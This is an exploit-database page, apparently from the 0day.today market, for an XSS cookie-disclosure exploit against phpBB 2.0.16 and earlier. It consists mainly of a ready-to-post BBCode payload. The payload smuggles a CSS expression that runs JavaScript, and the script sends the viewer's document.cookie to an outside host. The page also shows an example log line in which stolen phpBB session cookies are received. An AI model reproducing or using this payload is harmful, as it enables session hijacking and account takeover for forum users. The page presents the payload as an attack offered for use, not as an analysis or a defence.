[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit

Author
D|ablo
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-151
Category
web applications
Date add
07-07-2005
Platform
unsorted
====================================================
phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit 
====================================================




/*

Post the below code into a new message.

Example Output:
***.**.***.*** - - [09/Jul/2005:03:09:13 -0500] 
"GET /cgi-bin/shell.jpg?phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%223%22%3B%7D;%20phpbb2mysql_sid=898eeaa6ea3c9848a60121d3450a1287;%20phpbb2mysql_t=a%3A1%3A%7Bi%3A3%3Bi%3A1120845509%3B%7D HTTP/1.1" 404 305 "http://tester/phpBB2/viewtopic.php?t=3"

/str0ke
*/


******************************************************************************************************
*					CCTEAM PhpBB 2.0.16 XSS EXPLOIT                              *
*                                           Powered by D|ablo CCTEAM                                 *
******************************************************************************************************
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.milw0rm.com/cgi-bin/shell.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]

******************************************************************************************************




#  0day.today [2024-12-23]  #